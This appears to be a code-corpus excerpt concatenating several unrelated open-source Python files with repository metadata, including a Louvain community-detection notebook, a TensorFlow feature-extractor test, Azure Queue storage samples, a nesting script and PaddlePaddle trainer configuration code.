def forward(self, x):
x = self.features(x)
x = self.output(x).squeeze()
return x
if __name__ == '__main__':
model = ReXNetV1(width_mult=1.0)
out = model(torch.randn(2, 3, 224, 224))
loss = out.sum()
loss.backward()
print('Checked a single forward/backward iteration')
| 34.327869 | 118 | 0.587233 |
4a27e8a417ebb07878a27c45130fce57fd370802 | 10,164 | py | Python | notebooks/81.3-BDP-community.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | notebooks/81.3-BDP-community.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | notebooks/81.3-BDP-community.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | #%%
import os
import pickle
import warnings
from operator import itemgetter
from pathlib import Path
from timeit import default_timer as timer
import colorcet as cc
import community as cm
import matplotlib.colors as mplc
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import pandas as pd
import seaborn as sns
from joblib import Parallel, delayed
from matplotlib.cm import ScalarMappable
from sklearn.model_selection import ParameterGrid
from graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed
from graspy.plot import gridplot, heatmap, pairplot
from graspy.utils import symmetrize
from src.data import load_everything, load_metagraph, load_networkx
from src.embed import lse, preprocess_graph
from src.graph import MetaGraph, preprocess
from src.hierarchy import signal_flow
from src.io import savefig, saveobj, saveskels, savecsv
from src.utils import get_blockmodel_df, get_sbm_prob
from src.visualization import (
CLASS_COLOR_DICT,
CLASS_IND_DICT,
barplot_text,
bartreeplot,
draw_networkx_nice,
get_color_dict,
get_colors,
palplot,
probplot,
sankey,
screeplot,
stacked_barplot,
random_names,
)
FNAME = os.path.basename(__file__)[:-3]
print(FNAME)
# %% [markdown]
# # Parameters
BRAIN_VERSION = "2020-03-02"
BLIND = True
SAVEFIGS = False
SAVESKELS = False
SAVEOBJS = True
np.random.seed(9812343)
sns.set_context("talk")
def stashfig(name, **kws):
savefig(name, foldername=FNAME, save_on=True, **kws)
plt.close()
def stashcsv(df, name, **kws):
savecsv(df, name, foldername=FNAME, save_on=True, **kws)
def stashskel(name, ids, labels, colors=None, palette=None, **kws):
saveskels(
name,
ids,
labels,
colors=colors,
palette=None,
foldername=FNAME,
save_on=SAVESKELS,
**kws,
)
def stashobj(obj, name, **kws):
saveobj(obj, name, foldername=FNAME, save_on=SAVEOBJS, **kws)
def to_minigraph(
adj,
labels,
drop_neg=True,
remove_diag=True,
size_scaler=1,
use_counts=False,
use_weights=True,
color_map=None,
):
# convert the adjacency and a partition to a minigraph based on SBM probs
prob_df = get_blockmodel_df(
adj, labels, return_counts=use_counts, use_weights=use_weights
)
if drop_neg and ("-1" in prob_df.index):
prob_df.drop("-1", axis=0, inplace=True)
prob_df.drop("-1", axis=1, inplace=True)
if remove_diag:
adj = prob_df.values
adj -= np.diag(np.diag(adj))
prob_df.data = prob_df
g = nx.from_pandas_adjacency(prob_df, create_using=nx.DiGraph())
uni_labels, counts = np.unique(labels, return_counts=True)
# add size attribute base on number of vertices
size_map = dict(zip(uni_labels, size_scaler * counts))
nx.set_node_attributes(g, size_map, name="Size")
# add signal flow attribute (for the minigraph itself)
mini_adj = nx.to_numpy_array(g, nodelist=uni_labels)
node_signal_flow = signal_flow(mini_adj)
sf_map = dict(zip(uni_labels, node_signal_flow))
nx.set_node_attributes(g, sf_map, name="Signal Flow")
# add spectral properties
sym_adj = symmetrize(mini_adj)
n_components = 10
latent = AdjacencySpectralEmbed(n_components=n_components).fit_transform(sym_adj)
for i in range(n_components):
latent_dim = latent[:, i]
lap_map = dict(zip(uni_labels, latent_dim))
nx.set_node_attributes(g, lap_map, name=f"AdjEvec-{i}")
# add spring layout properties
pos = nx.spring_layout(g)
spring_x = {}
spring_y = {}
for key, val in pos.items():
spring_x[key] = val[0]
spring_y[key] = val[1]
nx.set_node_attributes(g, spring_x, name="Spring-x")
nx.set_node_attributes(g, spring_y, name="Spring-y")
# add colors
if color_map is None:
color_map = dict(zip(uni_labels, cc.glasbey_light))
nx.set_node_attributes(g, color_map, name="Color")
return g
def adjust_partition(partition, class_labels):
adjusted_partition = partition.copy().astype(str)
sens_classes = [
"sens-AN",
"sens-MN",
"sens-ORN",
"sens-PaN",
"sens-photoRh5",
"sens-photoRh6",
"sens-thermo;AN",
"sens-vtd",
]
for s in sens_classes:
inds = np.where(class_labels == s)[0]
adjusted_partition[inds] = s
return adjusted_partition
def run_louvain(g_sym, res, skeleton_labels):
out_dict = cm.best_partition(g_sym, resolution=res)
modularity = cm.modularity(out_dict, g_sym)
partition = np.array(itemgetter(*skeleton_labels)(out_dict))
part_unique, part_count = np.unique(partition, return_counts=True)
for uni, count in zip(part_unique, part_count):
if count < 3:
inds = np.where(partition == uni)[0]
partition[inds] = -1
return partition, modularity
def augment_classes(class_labels, lineage_labels, fill_unk=True):
if fill_unk:
classlin_labels = class_labels.copy()
fill_inds = np.where(class_labels == "unk")[0]
classlin_labels[fill_inds] = lineage_labels[fill_inds]
used_inds = np.array(list(CLASS_IND_DICT.values()))
unused_inds = np.setdiff1d(range(len(cc.glasbey_light)), used_inds)
lineage_color_dict = dict(
zip(np.unique(lineage_labels), np.array(cc.glasbey_light)[unused_inds])
)
color_dict = {**CLASS_COLOR_DICT, **lineage_color_dict}
hatch_dict = {}
for key, val in color_dict.items():
if key[0] == "~":
hatch_dict[key] = "//"
else:
hatch_dict[key] = ""
else:
color_dict = "class"
hatch_dict = None
return classlin_labels, color_dict, hatch_dict
def run_experiment(
graph_type=None, threshold=None, res=None, binarize=None, seed=None, param_key=None
):
# common names
if BLIND:
basename = f"{param_key}-"
title = param_key
else:
basename = f"louvain-res{res}-t{threshold}-{graph_type}-"
title = f"Louvain, {graph_type}, res = {res}, threshold = {threshold}"
np.random.seed(seed)
# load and preprocess the data
mg = load_metagraph(graph_type, version=BRAIN_VERSION)
mg = preprocess(
mg,
threshold=threshold,
sym_threshold=True,
remove_pdiff=True,
binarize=binarize,
)
adj = mg.adj
adj = symmetrize(adj, method="avg")
mg = MetaGraph(adj, mg.meta)
g_sym = mg.g
skeleton_labels = np.array(list(g_sym.nodes()))
partition, modularity = run_louvain(g_sym, res, skeleton_labels)
partition_series = pd.Series(partition, index=skeleton_labels)
partition_series.name = param_key
if SAVEFIGS:
# get out some metadata
class_label_dict = nx.get_node_attributes(g_sym, "Merge Class")
class_labels = np.array(itemgetter(*skeleton_labels)(class_label_dict))
lineage_label_dict = nx.get_node_attributes(g_sym, "lineage")
lineage_labels = np.array(itemgetter(*skeleton_labels)(lineage_label_dict))
lineage_labels = np.vectorize(lambda x: "~" + x)(lineage_labels)
classlin_labels, color_dict, hatch_dict = augment_classes(
class_labels, lineage_labels
)
# TODO then sort all of them by proportion of sensory/motor
# barplot by merge class and lineage
_, _, order = barplot_text(
partition,
classlin_labels,
color_dict=color_dict,
plot_proportions=False,
norm_bar_width=True,
figsize=(24, 18),
title=title,
hatch_dict=hatch_dict,
return_order=True,
)
stashfig(basename + "barplot-mergeclasslin-props")
category_order = np.unique(partition)[order]
fig, axs = barplot_text(
partition,
class_labels,
color_dict=color_dict,
plot_proportions=False,
norm_bar_width=True,
figsize=(24, 18),
title=title,
hatch_dict=None,
category_order=category_order,
)
stashfig(basename + "barplot-mergeclass-props")
fig, axs = barplot_text(
partition,
class_labels,
color_dict=color_dict,
plot_proportions=False,
norm_bar_width=False,
figsize=(24, 18),
title=title,
hatch_dict=None,
category_order=category_order,
)
stashfig(basename + "barplot-mergeclass-counts")
# TODO add gridmap
counts = False
weights = False
prob_df = get_blockmodel_df(
mg.adj, partition, return_counts=counts, use_weights=weights
)
prob_df = prob_df.reindex(category_order, axis=0)
prob_df = prob_df.reindex(category_order, axis=1)
probplot(
100 * prob_df, fmt="2.0f", figsize=(20, 20), title=title, font_scale=0.7
)
stashfig(basename + f"probplot-counts{counts}-weights{weights}")
return partition_series, modularity
# %% [markdown]
# #
np.random.seed(8888889)
n_replicates = 20
param_grid = {
"graph_type": ["G"],
"threshold": [0, 1, 2, 3],
"res": [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8],
"binarize": [True, False],
}
params = list(ParameterGrid(param_grid))
seeds = np.random.randint(1e8, size=n_replicates * len(params))
param_keys = random_names(len(seeds))
rep_params = []
for i, seed in enumerate(seeds):
p = params[i % len(params)].copy()
p["seed"] = seed
p["param_key"] = param_keys[i]
rep_params.append(p)
# %% [markdown]
# #
print("\n\n\n\n")
print(f"Running {len(rep_params)} jobs in total")
print("\n\n\n\n")
outs = Parallel(n_jobs=-2, verbose=10)(delayed(run_experiment)(**p) for p in rep_params)
partitions, modularities = list(zip(*outs))
# %% [markdown]
# #
block_df = pd.concat(partitions, axis=1, ignore_index=False)
stashcsv(block_df, "block-labels")
param_df = pd.DataFrame(rep_params)
param_df["modularity"] = modularities
stashcsv(param_df, "parameters")
| 29.806452 | 88 | 0.652696 |
4a27e8c8d649c4cb9ae961bffafc7ad824b63b25 | 5,411 | py | Python | research/object_detection/models/embedded_ssd_mobilenet_v1_feature_extractor_tf1_test.py | gujralsanyam22/models | d96f8f043dbe2b5ca8ea1785f57df8faf68d8875 | [
"Apache-2.0"
] | 82,518 | 2016-02-05T12:07:23.000Z | 2022-03-31T23:09:47.000Z | research/object_detection/models/embedded_ssd_mobilenet_v1_feature_extractor_tf1_test.py | yangxl-2014-fe/models | 11ea5237818e791a5717716d5413977f4c4db1e3 | [
"Apache-2.0"
] | 9,021 | 2016-03-08T01:02:05.000Z | 2022-03-31T08:06:35.000Z | research/object_detection/models/embedded_ssd_mobilenet_v1_feature_extractor_tf1_test.py | yangxl-2014-fe/models | 11ea5237818e791a5717716d5413977f4c4db1e3 | [
"Apache-2.0"
] | 54,341 | 2016-02-06T17:19:55.000Z | 2022-03-31T10:27:44.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for embedded_ssd_mobilenet_v1_feature_extractor."""
import unittest
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.models import embedded_ssd_mobilenet_v1_feature_extractor
from object_detection.models import ssd_feature_extractor_test
from object_detection.utils import tf_version
@unittest.skipIf(tf_version.is_tf2(), 'Skipping TF1.X only test.')
class EmbeddedSSDMobileNetV1FeatureExtractorTest(
ssd_feature_extractor_test.SsdFeatureExtractorTestBase):
def _create_feature_extractor(self, depth_multiplier, pad_to_multiple,
is_training=True):
"""Constructs a new feature extractor.
Args:
depth_multiplier: float depth multiplier for feature extractor
pad_to_multiple: the nearest multiple to zero pad the input height and
width dimensions to.
is_training: whether the network is in training mode.
Returns:
an ssd_meta_arch.SSDFeatureExtractor object.
"""
min_depth = 32
return (embedded_ssd_mobilenet_v1_feature_extractor.
EmbeddedSSDMobileNetV1FeatureExtractor(
is_training, depth_multiplier, min_depth, pad_to_multiple,
self.conv_hyperparams_fn,
override_base_feature_extractor_hyperparams=True))
def test_extract_features_returns_correct_shapes_256(self):
image_height = 256
image_width = 256
depth_multiplier = 1.0
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 512), (2, 8, 8, 1024),
(2, 4, 4, 512), (2, 2, 2, 256),
(2, 1, 1, 256)]
self.check_extract_features_returns_correct_shape(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_returns_correct_shapes_with_dynamic_inputs(self):
image_height = 256
image_width = 256
depth_multiplier = 1.0
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 512), (2, 8, 8, 1024),
(2, 4, 4, 512), (2, 2, 2, 256),
(2, 1, 1, 256)]
self.check_extract_features_returns_correct_shapes_with_dynamic_inputs(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_returns_correct_shapes_enforcing_min_depth(self):
image_height = 256
image_width = 256
depth_multiplier = 0.5**12
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 32), (2, 8, 8, 32), (2, 4, 4, 32),
(2, 2, 2, 32), (2, 1, 1, 32)]
self.check_extract_features_returns_correct_shape(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_returns_correct_shapes_with_pad_to_multiple_of_1(
self):
image_height = 256
image_width = 256
depth_multiplier = 1.0
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 512), (2, 8, 8, 1024),
(2, 4, 4, 512), (2, 2, 2, 256),
(2, 1, 1, 256)]
self.check_extract_features_returns_correct_shape(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_raises_error_with_pad_to_multiple_not_1(self):
depth_multiplier = 1.0
pad_to_multiple = 2
with self.assertRaises(ValueError):
_ = self._create_feature_extractor(depth_multiplier, pad_to_multiple)
def test_extract_features_raises_error_with_invalid_image_size(self):
image_height = 128
image_width = 128
depth_multiplier = 1.0
pad_to_multiple = 1
self.check_extract_features_raises_error_with_invalid_image_size(
image_height, image_width, depth_multiplier, pad_to_multiple)
def test_preprocess_returns_correct_value_range(self):
image_height = 256
image_width = 256
depth_multiplier = 1
pad_to_multiple = 1
test_image = np.random.rand(4, image_height, image_width, 3)
feature_extractor = self._create_feature_extractor(depth_multiplier,
pad_to_multiple)
preprocessed_image = feature_extractor.preprocess(test_image)
self.assertTrue(np.all(np.less_equal(np.abs(preprocessed_image), 1.0)))
def test_variables_only_created_in_scope(self):
depth_multiplier = 1
pad_to_multiple = 1
scope_name = 'MobilenetV1'
self.check_feature_extractor_variables_under_scope(
depth_multiplier, pad_to_multiple, scope_name)
if __name__ == '__main__':
tf.test.main()
| 40.684211 | 80 | 0.692293 |
4a27e92ab64631535ed5120c681f67b653628056 | 8,765 | py | Python | queue_advanced_samples.py | tamram/storage-queue-python-getting-started | a99597814950beb79397ab8b4abd82f89e55f5e0 | [
"MIT"
] | null | null | null | queue_advanced_samples.py | tamram/storage-queue-python-getting-started | a99597814950beb79397ab8b4abd82f89e55f5e0 | [
"MIT"
] | null | null | null | queue_advanced_samples.py | tamram/storage-queue-python-getting-started | a99597814950beb79397ab8b4abd82f89e55f5e0 | [
"MIT"
] | null | null | null | #----------------------------------------------------------------------------------
# Microsoft Developer & Platform Evangelism
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# THIS CODE AND INFORMATION ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
#----------------------------------------------------------------------------------
# The example companies, organizations, products, domain names,
# e-mail addresses, logos, people, places, and events depicted
# herein are fictitious. No association with any real company,
# organization, product, domain name, email address, logo, person,
# places, or events is intended or should be inferred.
#----------------------------------------------------------------------------------
from azure.storage.common import CloudStorageAccount, AccessPolicy
from azure.storage.queue import Queue, QueueService, QueueMessage, QueuePermissions
from azure.storage.common import CorsRule, Logging, Metrics, RetentionPolicy
from azure.common import AzureException
import config
from random_data import RandomData
import datetime
# -------------------------------------------------------------
# <summary>
# Azure Queue Service Sample - The Queue Service provides reliable messaging for workflow processing and for communication
# between loosely coupled components of cloud services. This sample demonstrates how to perform common tasks including
# inserting, peeking, getting and deleting queue messages, as well as creating and deleting queues.
#
# Documentation References:
# - What is a Storage Account - http://azure.microsoft.com/en-us/documentation/articles/storage-whatis-account/
# - Getting Started with Queues - https://azure.microsoft.com/en-us/documentation/articles/storage-python-how-to-use-queue-storage/
# - Queue Service Concepts - http://msdn.microsoft.com/en-us/library/dd179353.aspx
# - Queue Service REST API - http://msdn.microsoft.com/en-us/library/dd179363.aspx
# - Queue Service Python API - http://azure.github.io/azure-storage-python/ref/azure.storage.queue.html
# - Storage Emulator - http://msdn.microsoft.com/en-us/library/azure/hh403989.aspx
# </summary>
# -------------------------------------------------------------
class QueueAdvancedSamples():
def __init__(self):
self.random_data = RandomData()
# Runs all samples for Azure Storage Queue service.
# Input Arguments:
# account - CloudStorageAccount to use for running the samples
def run_all_samples(self, account):
try:
print('Azure Storage Advanced Queue samples - Starting.')
# create a new queue service that can be passed to all methods
queue_service = account.create_queue_service()
print('\n\n* List queues *\n')
self.list_queues(queue_service)
print('\n\n* Set cors Rules *\n')
self.set_cors_rules(queue_service)
print('\n\n* ACL operations *\n')
self.queue_acl_operations(queue_service)
print('\n\n* Set service logging and metrics properties *\n')
self.set_service_properties(queue_service)
print('\n\n* Set queue metadata *\n')
self.metadata_operations(queue_service)
except Exception as e:
if (config.IS_EMULATED):
print('Error occurred in the sample. Please make sure the Storage emulator is running.', e)
else:
print('Error occurred in the sample. Please make sure the account name and key are correct.', e)
finally:
print('\nAzure Storage Advanced Queue samples - Completed\n')
# Manage queues including, creating, listing and deleting
def list_queues(self, queue_service):
queue_prefix = "queuesample" + self.random_data.get_random_name(6)
try:
print('1. Create multiple queues with prefix: ', queue_prefix)
for i in range(5):
queue_service.create_queue(queue_prefix + str(i))
print('2. List queues with prefix: ', queue_prefix)
queues = queue_service.list_queues(queue_prefix)
for queue in queues:
print(' Queue name:' + queue.name)
finally:
print('3. Delete queues with prefix:' + queue_prefix)
for i in range(5):
if queue_service.exists(queue_prefix + str(i)):
queue_service.delete_queue(queue_prefix + str(i))
print("List queues sample completed")
# Manage CORS rules
def set_cors_rules(self, queue_service):
cors_rule = CorsRule(
allowed_origins=['*'],
allowed_methods=['POST', 'GET'],
allowed_headers=['*'],
exposed_headers=['*'],
max_age_in_seconds=3600)
try:
print('1. Get Cors Rules')
original_cors_rules = queue_service.get_queue_service_properties().cors
print('2. Overwrite Cors Rules')
queue_service.set_queue_service_properties(cors=[cors_rule])
finally:
print('3. Revert Cors Rules back the original ones')
#reverting cors rules back to the original ones
queue_service.set_queue_service_properties(cors=original_cors_rules)
print("CORS sample completed")
# Manage properties of the Queue service, including logging and metrics settings, and the default service version.
def set_service_properties(self, queue_service):
try:
print('1. Get Queue service properties')
props = queue_service.get_queue_service_properties();
retention = RetentionPolicy(enabled=True, days=5)
logging = Logging(delete=True, read=False, write=True, retention_policy=retention)
hour_metrics = Metrics(enabled=True, include_apis=True, retention_policy=retention)
minute_metrics = Metrics(enabled=False)
print('2. Ovewrite Queue service properties')
queue_service.set_queue_service_properties(logging=logging, hour_metrics=hour_metrics, minute_metrics=minute_metrics)
finally:
print('3. Revert Queue service properties back to the original ones')
queue_service.set_queue_service_properties(logging=props.logging, hour_metrics=props.hour_metrics, minute_metrics=props.minute_metrics)
print('4. Set Queue service properties completed')
# Manage metadata of a queue
def metadata_operations(self, queue_service):
queue_name = 'queue' + self.random_data.get_random_name(6)
try:
# Create a new queue
print('1. Create a queue with custom metadata - ' + queue_name)
queue_service.create_queue(queue_name, {'category':'azure-storage', 'type': 'queue-sample'})
# Get all the queue metadata
print('2. Get queue metadata')
metadata = queue_service.get_queue_metadata(queue_name)
print(' Metadata:')
for key in metadata:
print(' ' + key + ':' + metadata[key])
finally:
# Delete the queue
print("3. Delete Queue")
if queue_service.exists(queue_name):
queue_service.delete_queue(queue_name)
# Manage access policy of a queue
def queue_acl_operations(self, queue_service):
queue_name = 'aclqueue' + self.random_data.get_random_name(6)
try:
print('1. Create a queue with name - ' + queue_name)
queue_service.create_queue(queue_name)
print('2. Set access policy for queue')
access_policy = AccessPolicy(permission=QueuePermissions.READ,
expiry=datetime.datetime.utcnow() + datetime.timedelta(hours=1))
identifiers = {'id': access_policy}
queue_service.set_queue_acl(queue_name, identifiers)
print('3. Get access policy from queue')
acl = queue_service.get_queue_acl(queue_name)
print('4. Clear access policy in queue')
# Clear
queue_service.set_queue_acl(queue_name)
finally:
print('5. Delete queue')
if queue_service.exists(queue_name):
queue_service.delete_queue(queue_name)
print("Queue ACL operations sample completed") | 44.045226 | 147 | 0.616885 |
4a27e9b25c4342286aea0f16006d90f6d8b0fda9 | 140 | py | Python | loldib/getratings/models/NA/na_bard/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_bard/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_bard/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from .na_bard_top import *
from .na_bard_jng import *
from .na_bard_mid import *
from .na_bard_bot import *
from .na_bard_sup import *
| 23.333333 | 27 | 0.75 |
4a27e9cd0daf7177376030759c92fb92f6edf18f | 1,201 | py | Python | test_nfp.py | zhuyuanxiang/irregular_packing-1 | 5de4bf7ca51b6263ef44c1c7a6495e8b215e900c | [
"MIT"
] | 1 | 2022-02-15T19:59:59.000Z | 2022-02-15T19:59:59.000Z | test_nfp.py | zhuyuanxiang/irregular_packing-1 | 5de4bf7ca51b6263ef44c1c7a6495e8b215e900c | [
"MIT"
] | null | null | null | test_nfp.py | zhuyuanxiang/irregular_packing-1 | 5de4bf7ca51b6263ef44c1c7a6495e8b215e900c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import ast
import pandas as pd
from nfp_function import content_loop_rate
from nfp_function import Nester
from settings import BIN_CUT_BIG
from settings import BIN_NORMAL
from settings import BIN_WIDTH
from settings import LOOP_TIME
lingjian = pd.read_csv('.\L0002_lingjian.csv')
if __name__ == '__main__':
n = Nester()
s = [ast.literal_eval(contour) for contour in lingjian['外轮廓']]
n.add_objects(
# [ [ [0,0],[0,20],[20,0] ],
# [ [20,0],[20,10],[30,10],[30,0] ],
# [[10,0],[20,0],[20,10],[10,10]]
# ]
# [
# [[10,0],[20,0],[20,10],[10,10]],
# [[10,20],[20,20],[15,30]],
# [[30,10],[50,10],[35,15],[40,30],[30,30]]
# ]
s[:50] # ,lingjian['零件号'].values
)
if n.shapes_max_length > BIN_WIDTH:
BIN_NORMAL[2][0] = n.shapes_max_length
BIN_NORMAL[3][0] = n.shapes_max_length
# 选择面布
n.add_container(BIN_NORMAL)
# 运行计算
n.run() # 进行一次未生成子代的计算
# 设计退出条件
res_list = list()
best = n.best
# 放置在一个容器里面
# set_target_loop(best, n) # T6
# 循环特定次数
content_loop_rate(best, n, loop_time=LOOP_TIME - 1) # T7 , T4
| 24.02 | 66 | 0.565362 |
4a27e9fc7f2c4b7c99689da35bed05009b02b4be | 184 | py | Python | domain/rastrigin/rastrigin_ValidateChildren.py | Sascha0912/SAIL | 5dfb8d0b925d5e61933bf10591d959433fffaf26 | [
"MIT"
] | 2 | 2019-03-12T10:21:54.000Z | 2019-07-17T14:56:33.000Z | domain/rastrigin/rastrigin_ValidateChildren.py | Sascha0912/SAIL | 5dfb8d0b925d5e61933bf10591d959433fffaf26 | [
"MIT"
] | null | null | null | domain/rastrigin/rastrigin_ValidateChildren.py | Sascha0912/SAIL | 5dfb8d0b925d5e61933bf10591d959433fffaf26 | [
"MIT"
] | 1 | 2020-08-31T07:22:09.000Z | 2020-08-31T07:22:09.000Z | import numpy as np
def rastrigin_ValidateChildren(children, d):
validInds = np.full(children.shape[0], True)
# print("validChilds")
# print(validInds)
return validInds | 26.285714 | 48 | 0.711957 |
4a27ea3fd8871d3b3a5c62582c7cc65b2144c3c1 | 10,332 | py | Python | python/paddle/fluid/trainer_desc.py | 0YuanZhang0/Paddle | 118e585b8c28e56da6c39c2fcf21002625a67934 | [
"Apache-2.0"
] | 2 | 2020-02-11T08:53:05.000Z | 2020-02-20T08:06:25.000Z | python/paddle/fluid/trainer_desc.py | xixiaoyao/Paddle | a2e10930cf2781b58875abb9c475375e1282e575 | [
"Apache-2.0"
] | null | null | null | python/paddle/fluid/trainer_desc.py | xixiaoyao/Paddle | a2e10930cf2781b58875abb9c475375e1282e575 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of trainers."""
import sys
from os import path
__all__ = ['TrainerDesc', 'MultiTrainer', 'DistMultiTrainer', 'PipelineTrainer']
class TrainerDesc(object):
'''
Set proto from python to c++.
Can be initialized from train_desc.
'''
def __init__(self):
'''
self.proto_desc = data_feed_pb2.DataFeedDesc()
with open(proto_file, 'r') as f:
text_format.Parse(f.read(), self.proto_desc)
'''
# Workaround for relative import in protobuf under python3
# TODO: should be fixed
cur_path = path.dirname(__file__)
sys.path.append(cur_path)
sys.path.append(cur_path + "/proto")
from proto import trainer_desc_pb2
self.proto_desc = trainer_desc_pb2.TrainerDesc()
import multiprocessing as mp
# set default thread num == cpu count
self.proto_desc.thread_num = mp.cpu_count()
self._fleet_desc = None
self._device_worker = None
self._program = None
self._infer = False
def _set_fetch_var_and_info(self, fetch_vars, fetch_info, print_period):
for i, v in enumerate(fetch_vars):
self.proto_desc.fetch_config.fetch_var_names.extend([v.name])
self.proto_desc.fetch_config.fetch_var_str_format.extend(
[fetch_info[i]])
self.proto_desc.fetch_config.print_period = print_period
def _set_debug(self, debug):
self.proto_desc.debug = debug
def _set_thread(self, thread_num):
self.proto_desc.thread_num = thread_num
def _set_device_worker(self, device_worker):
self._device_worker = device_worker
def _set_infer(self, infer):
self._infer = infer
def _set_fleet_desc(self, fleet_desc):
self._fleet_desc = fleet_desc
def _gen_trainer_desc(self):
pass
def _set_program(self, program):
self._program = program
def _set_use_cvm(self, use_cvm=False):
self.proto_desc.use_cvm = use_cvm
def _set_no_cvm(self, no_cvm=False):
self.proto_desc.no_cvm = no_cvm
def _set_scale_datanorm(self, scale_datanorm=-1):
self.proto_desc.scale_datanorm = scale_datanorm
def _set_dump_slot(self, dump_slot):
self.proto_desc.dump_slot = dump_slot
def _set_mpi_rank(self, mpi_rank):
self.proto_desc.mpi_rank = mpi_rank
def _set_mpi_size(self, mpi_size):
self.proto_desc.mpi_size = mpi_size
def _set_dump_fields(self, dump_fields):
for field in dump_fields:
self.proto_desc.dump_fields.append(field)
def _set_dump_fields_path(self, path):
self.proto_desc.dump_fields_path = path
def _set_dump_file_num(self, dump_file_num):
self.proto_desc.dump_file_num = dump_file_num
def _set_dump_converter(self, converter):
self.proto_desc.dump_converter = converter
def _set_dump_param(self, dump_param):
for param in dump_param:
self.proto_desc.dump_param.append(param)
def _set_thread_barrier(self, thread_barrier):
self.proto_desc.thread_barrier = thread_barrier
def _set_check_nan_var_names(self, check_nan_var_names):
for var in check_nan_var_names:
self.proto_desc.check_nan_var_names.append(var)
def _set_loss_names(self, loss_names):
for loss in loss_names:
self.proto_desc.loss_names.append(loss)
def _set_adjust_ins_weight(self, config_dict):
self.proto_desc.adjust_ins_weight_config.need_adjust = \
config_dict.get("need_adjust", False)
self.proto_desc.adjust_ins_weight_config.nid_slot = \
config_dict.get("nid_slot", "")
self.proto_desc.adjust_ins_weight_config.nid_adjw_threshold = \
config_dict.get("nid_adjw_threshold", 0.0)
self.proto_desc.adjust_ins_weight_config.nid_adjw_ratio = \
config_dict.get("nid_adjw_ratio", 0.0)
self.proto_desc.adjust_ins_weight_config.ins_weight_slot = \
config_dict.get("ins_weight_slot", "")
def _set_copy_table_config(self, config_dict):
config = self.proto_desc.copy_table_config
config.need_copy = config_dict.get("need_copy", False)
config.batch_num = config_dict.get("batch_num", 100)
src_sparse_tables = config_dict.get("src_sparse_tables", [])
if not isinstance(src_sparse_tables, list):
src_sparse_tables = [src_sparse_tables]
dest_sparse_tables = config_dict.get("dest_sparse_tables", [])
if not isinstance(dest_sparse_tables, list):
dest_sparse_tables = [dest_sparse_tables]
if len(src_sparse_tables) != len(dest_sparse_tables):
raise ValueError(
"len(src_sparse_tables) != len(dest_sparse_tables)," \
" %s vs %s" % (len(src_sparse_tables), \
len(dest_sparse_tables)))
for i in src_sparse_tables:
config.src_sparse_tables.append(i)
for i in dest_sparse_tables:
config.dest_sparse_tables.append(i)
src_dense_tables = config_dict.get("src_dense_tables", [])
if not isinstance(src_dense_tables, list):
src_dense_tables = [src_dense_tables]
dest_dense_tables = config_dict.get("dest_dense_tables", [])
if not isinstance(dest_dense_tables, list):
dest_dense_tables = [dest_dense_tables]
if len(src_dense_tables) != len(dest_dense_tables):
raise ValueError(
"len(src_dense_tables) != len(dest_dense_tables)," \
" %s vs %s" % (len(src_dense_tables), \
len(dest_dense_tables)))
for i in src_dense_tables:
config.src_dense_tables.append(i)
for i in dest_dense_tables:
config.dest_dense_tables.append(i)
# user can also specify dense variables to copy,
# instead of copy dense table
src_var_list = config_dict.get("src_var_list", [])
if not isinstance(src_var_list, list):
src_var_list = [src_var_list]
dest_var_list = config_dict.get("dest_var_list", [])
if not isinstance(dest_var_list, list):
dest_var_list = [dest_var_list]
if len(src_var_list) != len(dest_var_list):
raise ValueError(
"len(src_var_list) != len(dest_var_list), %s vs" \
" %s" % (len(src_var_list), len(dest_var_list)))
for i in src_var_list:
config.src_var_list.append(i)
for i in dest_var_list:
